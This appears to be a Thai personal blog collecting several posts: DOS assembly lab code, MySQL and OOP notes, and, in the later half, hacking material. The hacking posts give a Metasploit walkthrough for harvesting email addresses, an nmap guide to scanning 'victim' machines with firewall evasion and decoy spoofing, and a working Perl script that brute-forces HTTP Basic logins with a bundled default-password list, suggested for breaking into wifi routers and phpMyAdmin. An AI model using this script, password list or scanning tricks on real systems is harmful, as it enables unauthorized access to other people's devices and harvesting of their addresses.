CODE : GREAN ASM Lab Assignment V.2

ตัวอย่างโค๊ต Tank Lab ASM

Assignment : TANKZ ASM

LINES : 200

Bug : Not found.

*ใครเจอบัคบอกด้วยน้อ T..T

เลื่อนได้ทั้งเมาส์ และ คีย์บอร์ด (ลูกศร ขึ้น ขวา ลง ซ้าย)

กด คลิกขวา,esc = exit program

ตรง mov ah,11h int 16h >> อยู่ที่รุ่นของคีย์บอร์ดแต่ละคนด้วย

บางคนอาจจะ 01h int 16h

Modify รูปรถถังได้ตามใจชอบ ใน function TANKZ

แต่ถ้าเกิน 5 ช่อง ต้องคำนวนระยะขอบใหม่ด้วย..

มีไรสงสัย ถามใน m นะ

* best preview on DosBox.

*v.2 แก้ไขตกขอบใน dos ธรรมดา แต่ใช้เมาส์เลื่อนก้ยังตกขอบ ซ้าย-ขวา :]

อาจจะต้อง เขียนเช็คสด เพราะ dos ธรรมดา ไม่รับฟังชั่นกำหนดขอบเขตเมาส์

Good Luck.

http://gokuz.pastebin.com/cVktxucf

Ref : GokU

MySQL Commands :]

Merry Chistmas everyone :PPP

ไปเจอเวปคำสั่งเกี่ยวกับ MySQL ดี ๆ

เลยอัพๆ ไว้กันลืมซะหน่อย !

MySQL Command

. . . . . . . . . .

OOP = ?

บ่น ๆ ไว้ในบล๊อคกันลืม :P

OOP (Object-Oriented Programing) หรือการเขียนโปรแกรมเชิงวัตถุ เป็นการเขียนโปรแกรมที่แตกต่างจากการเขียน

โปรแกรมแบบธรรมดา (แบบโครงสร้าง:Structure Programing) เป็นการเขียนโปรแกรมที่มองสิ่งต่างๆของโปรแกรมเป็นวัตถุ

โปรแกรมเชิงวัตถุ สร้างมาจากกลุ่มของออบเจ็กต์ หรือวัตถุ ซึ่งแต่ละออบเจ็กต์จะบรรจุ Attribute(*1) และ Operation(*2) ภาย

ในตัวออกเจ็กต์เอง และแต่ละ Object จะเชื่อมต่อการทำงานเข้าด้วยกัน
(*1)Attribute คือ คุณสมบัติหรือตัวแปรที่มีความสัมพันธ์กับ Object
(*2)Operation คือ การกระทำหรือฟังก์ชันที่ Object สามารถการทำปรับเปลี่ยนตัวมันอง หรือแสดงผลออกมาภายนอกได้

ประโยชน์ของการเขียนโปรแกรมเชิงวัตถุคือ
1. การจัดรูปแบบโค้ดเป็นระบบระเบียบ ทำให้ง่ายต่อการพัฒนา และแก้ไขในภายหลัง
2.มีการป้องกันของข้อมูล เพื่อป้องกันการนำข้อมูลไปใช้อย่างผิดๆ ดังนั้นหากต้องการนำข้อมูลภายใน Object ไปใช้
3.การนำไปใช้สามารถทำได้ง่ายไม่ยุ่งวุ่นวาย และสามารถนำไปใช้ซ้ำได้โดยไม่ต้องเขียนโค้ดใหม่

Class คือ เค้าโครงที่ใช้กำหนดลักษณะของออบเจ็กต์ และใช้แทนกลุ่มของออบเจ็กต์ แต่ละคลาส(Class) ประกอบไปด้วย

Operation เดียวกันกระทำในทิศทางเดียวกัน และ Attribute เดียวกันในการแทนสิ่งเดียวกัน
ยกตัวอย่างเช่น หุ่นยนต์ คิดเป็น Class ของ Object ที่ใช้อธิบายคุณลักษณะต่างๆ เปรียบได้กับ Attribute เช่น กลไกในการ

เคลื่อนที่ หน่วยความจำ และการกระทำต่างๆของหุ่นยนต์เปรียบได้กับ Operation เช่นการเคลื่อนที่ของหุ่นยนต์

ยังมีอีกมากมาย >,,<"

ref : 1 , 2

ps* ตอนแรกแค่อยากรู้ ให้เข้าใจกว่าเดิม อ่านไป อ่านมา ยิ่งลึก ยิ่งงง T..T

CODE : ASM Lab Assignment :]

Code assembly lab assignmet !!!

ยังไม่มี Flow Chart นะ ยังไม่ได้ทำ ฮ่า ๆ

สงสัยไร ถามใน m นะ ,, :)

req - ต้องเตรียมข้อความภาษาอังกฤษ save เป็น .txt (เพื่อเปิดมาอ่านได้)

edit * เพิ่ม flowchart ให้แบบเกือบละเอียด ห้าห้า (คลิกดูรูปใหญ่ได้มั่ง :P)

.model small
.stack
.data
str0 db "Enter Input File Name : ",'$'
strlen db 20
actual db 0
bufferz db 20 dup(0)
str0out db "Enter Output File Name : ",'$'
strlenout db 20
actualout db 0
bufferzout db 20 dup(0)

;Filename db "goku.txt",0
Filehandle dw 00
buffer db 10000 dup(?),"$"

;Filesave db "output.txt",0
fh dw 00
bfh db 10000 dup(?)
bfh2 db 10000 dup(?)

counter1 db 0
counter2 db 0
.code
main proc
mov ax,@data
mov ds,ax
;set mode
mov ah,0
mov al,3
int 10h

call FILE
call CLEAR
call FILE2

newpage:
;clear screen
mov ah,07h
mov al,00h
mov bh,00000111b
sub cx,cx
mov dx,184fh
int 10h
;set ruler
mov counter1,27

entez:
sub counter1,1
cmp counter1,0
je check
mov counter2,79
again:
mov al,[si]
mov ah,02h
mov dl,al
int 21h

mov [di],al
inc si
inc di

cmp al,0Dh
je entez
dec counter2
jnz again
mov ah,02h
mov dl,0Dh
int 21
cmp counter2,0
je entez

check:
;check enter esc
mov ah,0
int 16h
cmp al,0Dh
je newpage
cmp al,1Bh
je scanbfh
jmp check

scanbfh:
lea si,bfh
lea bx,bfh2
mov cx,29999

chk:
;check k
mov al,4bh
cmp [si],al
jne not_chk
inc si
dec cx
jz exit
chm:
mov al,4dh
cmp [si],al
jne not_chm
inc si
dec cx
jz exit
chi:
mov al,49h
cmp [si],al
jne not_chi
inc si
dec cx
jz exit
cht:
mov al,54h
cmp [si],al
jne not_cht
inc si
dec cx

mov al,4bh
mov [bx],al
inc bx
mov al,4dh
mov [bx],al
inc bx
mov al,49h
mov [bx],al
inc bx
mov al,54h
mov [bx],al
inc bx
mov al,4ch
mov [bx],al
inc bx
jmp chk

not_chk:
mov dx,[si]
mov [bx],dx
inc si
inc bx
dec cx
jz exit
jmp chk

not_chm:
mov al,4bh
mov [bx],al
inc bx
jmp not_chk

not_chi:
mov al,4bh
mov [bx],al
inc bx
mov al,4dh
mov [bx],al
inc bx
jmp not_chk

not_cht:
mov al,4bh
mov [bx],al
inc bx
mov al,4dh
mov [bx],al
inc bx
mov al,49h
mov [bx],al
inc bx
jmp not_chk

exit:
;write output
mov ah,40h
lea dx,bfh2
mov cx,30000
mov bx,fh
int 21h

;close file
mov bx,Filehandle
mov ah,3eh
int 21h
mov bx,fh
mov ah,3eh
int 21h

;end proc
mov ah,4ch
INT 21h

main endp

FILE PROC
mov ah,09h
mov dx,offset str0
int 21h

mov ah,0Ah
mov dx,offset strlen
int 21h

lea bx,bufferz
add bl,actual
sub ah,ah
mov [bx],ah

mov ah,02h
mov dl,0Ah
int 21h
mov dl,0dh
int 21h

mov ah,09
mov dx,offset str0out
int 21h

mov ah,0Ah
mov dx,offset strlenout
int 21h

lea bx,bufferzout
add bl,actualout
sub ah,ah
mov [bx],ah
ret
FILE ENDP

CLEAR PROC
;clear screen
mov ah,07h
mov al,00h
mov bh,00000111b
sub cx,cx
mov dx,184fh
int 10h
ret
CLEAR ENDP

FILE2 PROC
;openfile
lea dx,bufferz
mov ah,3dh
mov al,0
int 21h
mov FileHandle,ax

;create file save
lea dx,bufferzout
mov ah,3ch
mov cx,0
int 21h
mov fh,ax

;readfile
mov ah,3fh
lea dx,buffer
mov cx,10000
mov bx,FileHandle
int 21h

cld
lea si,buffer
lea di,bfh
ret
FILE2 ENDP

end main

Ref : By GokU.

Harvest email addresses with metasploit

Tutorial on how to harvest email addresses with metasploit.

1)First thing to do is open a msfconsole and type

search gather

2) Type

use gather/search_email_collector

3) Now you need to set the domain you can use what you want eg gmail.com, yahoo.com, l33thackers.com for this tutorial we will use gmail.com

set domain gmail.com

then

run

Now you should have a list of email addreses its as simple as that.


Did a search for l33thackers.com and it come up with 1 email, must be the old domain owner.




Enjoy



Forgot to add you can also output to a txt file to make a list use this before or after "set domain"

set outfile /root/list.txt

This will ouput file to desktop.

ref : I33 :)

Start for Nmap :]

@Goku เจอบทความนี้ อ่านทีเดียว พอเข้าใจหลักการทำงานของ nmap เลย :]

เทคนิคการ Ping Sweep
ใน บทความต่อไปนี้ ผมจะมุ่งประเด็นเกี่ยวกับเรื่องการแสกนว่ามีเรื่องไหนยัง login อยู่หรือกำลังใช้งาน และ port ต่างที่เครื่องเหยื่อได้เปิดเอาไว้ จากบทความของผม เวลาคุณจะต้องสนใจเครื่องของเหยื่อที่ port 139 กับ 445 เท่านั้น เพราะเป็นส่วนจำเป็นในการ Hack Window
คือการ ping ไปยังเครื่องเป้าหมายที่จำนวนมากๆ ในวง Network ที่คุณใช้อยู่ หรือวง lan นั่นเอง (ใน Internet ก็ใช้ได้) โดยแสกนพร้อมๆกัน คล้ายกับการ
กราดยิง เพื่อตรวจสอบว่าเครื่องปลายทางได้เปิดอยู่หรือไม่ก็ตาม เช่นคุณมี IP x.y.z.6 ตรง x.y.z อาจเป็นตัวเลขใดๆก็ได้ แต่เลข 6 คือเลขชุดหลังของ ip คุณ เวลาคุณแสกนหาให้เขียนลงไปดังนี้ x.y.z.0/24 จากตรงเลข 6 เปลี่ยนเป็น 0/24 หมายความว่าเป็นการแสกน IP ตั้งแต่ x.y.z.1- x.y.z.255
ยกตัวอย่าง
สมมติ คุณกำลังต่อเน็ต หรือกำลังใช้คอมอยู่ในวงแลน ให้คุณเิดหน้าต่างดอสขนึ้มา (หรือ Start > Run พิมพ์ cmd.exe) พอหน้าต่างดอสขนึ้มาให้คุณพิมพ์ ipconfig แล้วกด Enter

C:\>ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Media State . . . . . . . . . . . : Cable Disconnected
PPP adapter TOT:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 172.16.66.216
Subnet Mask . . . . . . . . . . . : 255.255.255.255
Default Gateway . . . . . . . . . : 172.16.66.216

ให้ คุณดูที่ตัวหนังสือสีแดงครับ คือ IP ของคุณเอง จากนั้น IP เครื่องต่างๆที่อยู่ในวงแลนเน็ตของคุณ หรือวงแลนสำนักงานคุณ ก็จะมี IP ประมาณว่า
172.16.66.1 ถึง 172.16.66.225 ครับผม แต่เวลาแสกนถ้าคุณมากำหนดเป็นตัวเลขอาจต้องพิมพ์แบ่งช่วงเอาเอง แต่ถ้าคุณจะแสกน port ทั้งวงแลน คือ แสกนมันทุกเครื่องในวงแลนเลย เวลาคุณกำหนด IP ก็ต้องใช้คำสั่งกำหนด เป็น 172.16.66.0/24
โดยปรกติ ถ้าคุณใช้คำสั่ง ping ธรรมดา จะมีการส่ง ICMP ECHO (Type ออกไปยังเครื่องปลายทางและรอคอย ICMP ECHO_REPLY (Type 0) ส่งกลับมา ถึงแม้ ping จะมีประโยชน์ในการทดสอบว่าเครื่องปลายทางนั้นเปิดอยู่หรือไม่ก็ตาม แต่มันจะเหมาะกับ Network ขนาดเล็กและขนาดกลางเท่านั้น ซึ่งถ้ามาใช้ในใน Network ขนาดใหญ่อย่าง Internet มักจะใช้ได้ไม่มีประสิทธิภาพ โดยใช้ –sP เป็นการ ping scan (กรณีนี้ผมไ้ด้ เอาโปรแกรม nmap มาแตกใส่ไว้ที่ไดร์ฟ C:)
C:>nmap –sP 172.16.66.0/24
คำ สั่งนี้จะใช้ได้เมื่อคุณได้อยู่ในวง Network เดียวกับคุณ หรือ วงอื่น ซึ่งจะแสกนวงเดียวกับคุณ IP 172.16.66.0 – 172.16.66.255 หมายถึง คุณต้องมี IP ที่อยู่ระหว่าง 172.16.66.0 – 172.16.66.255 ถึงจะใช้คำสั่งนี้ได้ เช่นคุณมี IP = 172.16.66.216 สังเกตเลขชุดสุดท้ายที่อยู่หลังจุดให้ดีๆ อาจเป็นเลขอะไรก็ได้ จาก 1-255 ถึงจะใช้ 0/24 แทน หรือ
C:>nmap –sP 172.16.66.11-172.16.66.20
คำสั่งนี้จะแสกนเครื่องที่อยู่ในวง Network ที่มี IP ระหว่าง 172.16.66.11 - 172.16.66.20
C:>nmap –sP 172.16.66.* หรือ C:>nmap –sP 172.16.66.0/24
คำสั่งนี้จะแสกนเครื่องที่อยู่ในวง Network ที่มี IP 172.16.66.1 ถึง 172.16.66.255
โดย ปรกติ ถ้าคุณใช้คำสั่ง ping ธรรมดา จะมีการส่ง ICMP ECHO (Type ออกไปยังเครื่องปลายทางและรอคอย ICMP ECHO_REPLY (Type 0) ส่งกลับมา ถึงแม้ ping จะมีประโยชน์ในการทดสอบว่าเครื่องปลายทางนั้นเปิดอยู่หรือไม่ก็ตาม แต่มันจะเหมาะกับ Network ขนาดเล็กและขนาดกลางเท่านั้น ซึ่งถ้ามาใช้ในใน Network ขนาดใหญ่อย่าง Internet มักจะใช้ได้ไม่มีประสิทธิภาพ โดยใช้ –sP เป็นการ ping scan เพื่อเป็นการตรวจสอบว่ามีเครื่องใดกำลัง logon อยู่


nmap –sP 203.118.98.0/24
คำ สั่งนี้จะใช้ได้เมื่อคุณได้อยู่ในวง Network เดียวกับคุณ หรือ วงอื่น ซึ่งจะแสกนวงเดียวกับคุณ IP 203.118.98.0 – 203.118.98.255 หมายถึง คุณต้องมี IP ที่อยู่ระหว่าง 203.118.98.0 – 203.118.98.255 ถึงจะใช้คำสั่งนี้ได้ เช่นคุณมี IP = 203.118.98. 10 สังเกตเลขชุดสุดท้ายที่อยู่หลังจุดให้ดีๆ อาจเป็นเลขอะไรก็ได้ จาก 1-255 หรือจะใช้ 0/24 แทน หรือ
nmap –sP 203.118.98.11-203.118.98.20
คำสั่งนี้จะแสกนเครื่องที่อยู่ในวง Network ที่มี IP ระหว่าง 203.118.98.11 - 203.118.98.20
nmap –sP 203.118.98.* หรือ C:>nmap –sP 203.118.98.0/24
คำสั่งนี้จะแสกนเครื่องที่อยู่ในวง Network ที่มี IP 203.118.98.1 ถึง 203.118.98.255
(เครื่องมือ nmap นี้ จะเป็นการหาแบบละเอียด เมื่อเทียบกับโปรแกรมอื่น แต่อาจใช้เวลานานกว่า)

เทคนิคการแสกนหลบ เมื่อเครื่องปลายทาง block ICMP
จะ เป็นการ Ping Sweep ขั้นสูงที่เรียกว่า TCP Ping scan โดยการใช้พารามิเตอร์ –PT พร้อมกับระบุหมายเลข port ต่างๆเข้าไป ซึ่งการระบุเลข port นั้นจะต้องทราบว่าเครื่องส่วนใหญ่นั้นจะต้องเปิดเอาไว้เพื่อติดต่อสื่อสาร กับเครื่อง
อื่นๆ เช่น http 80 , SMTP 25 , POP 110 , IMAP 143 และอื่นอีกมาก ซึ่งปรกติจะต้องเปิดไว้คือ http 80 ซึ่งอาจทะลุผ่าน firewall ได้ถ้ามีการกำหนด firewall ได้ไม่ดี
nmap –sP –PT 80 203.118.98.0/24
ตรง เลข 80 ที่ผมได้ทำสีไว้เป็นการแสกนผ่านทาง http 80 ซึ่งอาจเปลี่ยนเป็นเลข port อื่นๆได้ตามที่ได้กล่าวมาด้านบนซึ่ง port ต่างๆที่ได้ใส่ไปก็คือการหา service นั่นเอง SMTP 25 , POP 110 , IMAP 143
nmap –sP –PT 25 203.118.98.0/24 เป็นการหาว่าเครื่องในวงแลนคุณเครื่องไหนเปิด SMTP 25
nmap –sP –PT 110 203.118.98.0/24 เป็นการหาว่าเครื่องในวงแลนคุณเครื่องไหนเปิด POP 110
nmap –sP –PT 143 203.118.98.0/24 เป็นการหาว่าเครื่องในวงแลนคุณเครื่องไหนเปิด IMAP 143

เทคนิคการแสกนแบบ TCP FIN scan
เทคนิคนี้สามารถที่จะทะลุผ่านไฟล์วอลล์ ส่วนใหญ่ และมีการเก็บผลลัพธ์ไว้ในไฟล์ text
nmap –sF 203.118.98.0/24 –oN output.txt
จาก บรรทัดบน –sF เป็นการแสกนแบบ Stealth FIN รายละเอียดให้ดูรูปประเภทการแสกนที่อยู่ช่วงแรกๆ และพารามิเตอร์ –o เป็นการบันทึกผลลงเป็นไฟล์ ส่วน N หลัง –o ตรง (-oN) หมายถึงให้บันทึกในรูปแบบที่อ่านเข้าใจได้โดยโปรแกรมจะสร้างไฟล์ output.txt หรือถ้าคุณต้องการบันทึกเพื่อจะนำไปใช้กับโปรแกรมอื่นๆ ให้ระบุเป็น พารามิเตอร์ –oM แทน
ผมเหนื่อยแระ ขี้เกียจทำเป็็นหัวข้อ

คุณ อาจใช้ Option + Parameter อื่นๆ ผสมผสานกันได้ โดยประยุกต์จากตัวอย่างต่างๆที่ผมได้ทำเป็นตัวอย่างดังที่เห็นอยู่ ซึ่งจะทำให้การใช้งานเครื่องมือนี้ มีประสิทธิภาพมากขึ้น ในการแสกนหาเครื่องเหยื่อ ในโปรแกรม Nmap ได้อย่างลงตัวกับสถานะการณ์ (แต่ต้องหัดเอาเองบ้างนะ) ซึ่งผลจากการแสกนต่างๆนั้นรับรองได้้เลยว่าโปรแกรมอื่นคงทำไม่ได้อย่าง โปรแกรมนี้ แต่มันก็ยากในการใช้งาน เพราะ Option ในตัวโปรแกรมช่างเยอะเหลือเกิน จะถอดใจตอนนี้ก็ยังไม่สายนะ ดูชื่อเว็บที่ผมตั้งสิ กรรมกรไซเบอร์ มันก็ต้องออกแรงกันหน่อย และสำหรับคนที่ยังไม่ถอดใจ ผมก็จะมีตัวอย่าง และ Tip เด็ดๆให้อีกเล็กๆน้อยๆ
Nmap มีความสามารถในการหลอก firewall เครื่องปลายทาง โดยการส่งแพ็คเก็ตปลอมจำนวนมากที่ไม่เกี่ยวข้องกับการแสกนเข้าไปในระบบ ด้วยการใช้พารามิเตอร์ –D และขณะเดียวกันก็ทำการแสกนจริงๆไปด้วย และด้วยการเพิ่มความยากในการตรวจจับ สามารถปลอม IP ADDRESS ของ server อื่นที่มีอยู่จริง แต่ถ้า IP ADDRESS ที่ปลอมนั้นไม่มีอยู่จริงๆ การแสกนของคุณจะเป็นการทำ SYN Flood ซึ่งไปเข้าเงื่อนไขการโจมตีระบบด้วย Denial of Service (การทำให้ Network ล่ม คือทำให้การรับส่งข้อมูลใน Network คับคั่งหรือที่เห็นง่ายๆก็คือ เน็ตจะช้า หรือเครื่องอาจหลุดจาก Internet ได้) วิธีดูจากข้างล่างนี้
nmap –sS 203.118.98.110 –D 203.114.234.5
-sS เป็นการแสกนแบบ TCP SYN scan 192.16.81.110 เป็น IP เครื่องเป้าหมายที่คุณจะแสกน และส่วนที่ตามหลัง Option –D คือ IP 203.114.234.5 เป็น IP Server ของอะไรก็ได้เช่น yahoo , sanook ซึ่งจะหา IP นี้ได้โดยการ เปิด ดอส ขึ้นมาแล้วพิมพ์ c:\ping http://www.yahoo.com/ เท่านี้คุณก็จะได้ IP Server จริงๆ ที่จะนำมาใช้ในคำสั่งนี้ แต่ถ้าคุณเอา ไอพีมามั่วๆ จะเป็น เข้าเงื่อนไขการโจมตีระบบด้วย Denial of Service
nmap –O 203.121.148.18
คำ สั่งบนนี้ จะเป็นการหาข้อมูลจากเครื่องที่ มี IP 203.121.148.18 ว่ามีการเปิดที่ Port ไหนบ้าง และใช้ระบบปฏิบัติการอะไร แต่การแสกนอาจใช้เวลานาน ถ้าคนที่ใจร้อนอาจหันไปพึ่งโปรแกรมอื่น ผมก็ไม่ว่าอะไรครับ แต่ขอบอก โปรแกรมนี้ แสกนได้แม่นยำกว่าโปรแกรมอื่นอยู่มากทีเดียว
nmap –p80 –O 203.121.148.18
คำสั่งบนนี้ เป็นการใช้ option –p เข้ามาช่วยหา ในกรณีที่เครื่องเหยื่อได้เปิด port 80 เอาไว้

การประยุกต์ใช้งานอื่นๆ
nmap –sS –p 25,80,135-139,455 –n 203.118.98.110
จาก คำสั่งบนนี้ เป็นการแสกนไปที่เครื่อง 203.118.98.110 ไปที่ port 25 , port 80 , port 135 , 136 ,137 , 138 ,139 , port 455 ว่าเปิดอยู่หรือไม่
nmap –sS –O 203.118.98.110
จะ เห็นว่าคำสั่งนี้ คลอบคลุมกว่า 2 คำสั่งด้านบน ยิ่งถ้าคุณได้เพิ่ม Option –p แล้วใส่ port ที่ต้องการแสกนได้อีกด้วยครับ แต่บางที Option –sS อาจหลบ Firewall ไม่ได้
Option –T 4 เป็นอีก option ที่น่าสนใจเป็นอย่างมาก คุณลองใช้ option ลงไปร่วมกับ option อื่นได้ จะช่วยให้การแสกนนั้นรวดเร็วยิ่งขึ้นครับเช่น
nmap –sS –O –T 4 203.118.98.110
nmap –sP –PT80 –T 4 203.118.98.0/24
การแสกนตรวจประเภท Firewall
nmap –sW 203.118.98.110 และคำสั่ง nmap –sA 203.118.98.110
คำ สั่งบนนี้ เป็นการตรวจสอบ Firewall ว่าเป็นประเภทไหน ในเครื่องที่มี IP 203.118.98.110 ทั้ง 2 Option นี้อาจเป็นตัวที่ใช้เจาะเครื่องที่มี firewall ป้องกัน เพื่อที่จะดูว่า จริงๆแล้วเปิด port อะไรบ้าง เพราะเราจะสามารถรู้ ระบบปฏิบัติการในเครื่องที่เราแสกนได้ จาก port ที่ได้เปิด
ในแต่ละเครื่อง ใน Internet คุณไม่สามารถไปดูที่หน้าจอได้ จึงยากต่อการรู้ว่า เครื่องนั้นๆ ใช้วินโดว์หรือ unix หรือ Linux เพราะฉนั้น คุณต้องดู port จากเครื่องเป้าหมาย แต่โปรแกรมแสกนธรรมดา จะไม่สามารถแสกน port ได้จากเครื่องที่ได้ติดตั้ง Firewall (แต่จริงๆ ก็เปิด port อยู่) จึงต้องใช้โปรแกรม nmap แสกน เพราะสามารถหลบ Firewall ได้
Window Port Default ข้างล่างนี้เป็น port มาตรฐาน ที่ Win มักจะเปิด และเราจะรู้ได้ หรือเดาได้ว่าใช้อะไร
Win 98/me 139
Win 2000/xp 139 – 445
Win 2000 Server 53 – 88 - 139 – 445
ส่วน UNIX / LINUX คุณจะเห็นความแตกต่าง port ที่เปิดเองครับ จะไม่เหมือน Window แน่นอนครับ

nmap –I ....IP....
อีก option ที่คุณน่าลองดู

Credit : Neverdie_bo

Perl : Brute Authentication

วันนี้เอา script perl ดีๆ มาฝากอีกอัน ห้าห้า จากพี่เล็ก window98se @thd (มหาเทพ perl)

Bruth.pl

#############################################
# !/usr/bin/perl
# Brute Authentication [by windows98SE]
# Copyright (c) 2010
#
# This software is open source, licensed under the GNU General Public
# License, version 2.
# Basically, this means that you're allowed to modify and distribute
# this software. However, if you distribute modified versions, you MUST
# also distribute the source code.
# See http://www.gnu.org/licenses/gpl.html for the full license.

use Socket;
use IO::Socket;
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

my $target = '192.168.1.1';
my @userlist = ('admin');
my @passlist = readFile("pass.txt");
my $outfile = 'hack.txt';

my %result;
print "[+] Start Scan..\n";
scan($target);
print "[+] Done.\n";
system ("pause");

sub scan {
my ($target) = @_;
foreach my $user (@userlist){
foreach my $pass (@passlist){
print "[+] Test $pass ..\n";
my $browser = LWP::UserAgent->new();
my $auth = HTTP::Request->new(GET=> 'http://'.$target);
$auth->authorization_basic($user,$pass);
my $result = $browser->request($auth)->status_line;
if($result =~ m/200/ig){
$result{$target} = "$user:$pass";
print "[+] Found $target pass is [$user:$pass] ..\n";
open(File, ">>", $outfile);
print File "[+] $target ($result{$target})\n";
close(File);
print "\n\n[+] $target ($result{$target})\n\n";
return;
}
}
}
}


sub readFile{
my @var;
my ($file) = @_;
open FILE, "<:utf8", "$file" or die "[+] Can't open $file : $!"; while(){
my $line = $_;
$line =~ s/\r|\n//g;
next if (length($line) == 0);
push(@var,$line);
}
close FILE;
return(@var);
}

ต่อไปก็ pass.txt

TTT
ttt
tot
TOT
admin
1234
123456
123456789
tot1234
123456123456

1234admin
synnet
tech
ANYCOM
ILMI

PASSWORD
Password
password

adminttd
comcomcom
monitor
manager
security
recovery
Wireless

volition
3ware
anicust
0

สามารถเอาไปทำได้หลายอย่างนะ แต่ต้องมีหน้า Authentication Login ไม่งั้นต้องแก้สคริป สามารถประยุกต์ได้นะ 555+ hack wifi , hack phpmyadmin


@GokU คงใช้กันเป็นน ห้าห้า